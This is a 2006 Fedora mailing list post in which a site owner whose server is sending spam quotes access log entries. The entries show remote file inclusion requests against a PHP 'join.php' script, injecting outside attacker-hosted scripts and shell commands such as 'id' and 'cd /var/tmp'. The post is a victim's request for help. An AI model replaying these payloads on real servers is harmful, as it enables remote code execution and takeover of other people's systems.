Postfix hit again (Spam)

CodeHeads codeheads at gmail.com
Tue May 23 15:25:19 UTC 2006 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul at city-fan.org> wrote:

> On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > 
> > On Tue, 23 May 2006 00:14:32 +0000
> > replies-lists-redhat at listmail.innovate.net wrote:
> > > i haven't been following this topic in great detail, but i suspect that
> > > you have a form on your site that is being exploited for "form spam".
> > > if you're not familiar with this, search google for "form spam".
> > > 
> > >    - Rick
> > 
> > 
> > Rick,
> > Thank you, No, I have not heard of this.
> 
> I don't think that's what this is. Form spam takes advantage of
> poorly-coded mail/contact forms and uses them to send mail to recipients
> other than those intended by the form designer.
> 
> What's happening here is that the spammer is running their own code
> (downloaded into /tmp) to send the mail, a rather more serious
> situation.
> 
> Paul.
> 
I might not know too much but I really think they are using my forms.  I found
quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400]
"POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
HTTP/1.0" 200 5923

AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
HTTP/1.1" 200 2323

And the xpl.netmisphere2.com site has hacking information:
http://xpl.netmisphere2.com/  I think this outta be illegal!!
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEcylffw3TK8jhZrsRAq16AJ930YTN4X/cSN8NZEVHYfJYjQ/dfwCgmTED
xgS0Iv+yX2HhWQkREzXW+SI=
=CyYw
-----END PGP SIGNATURE-----

More information about the fedora-list mailing list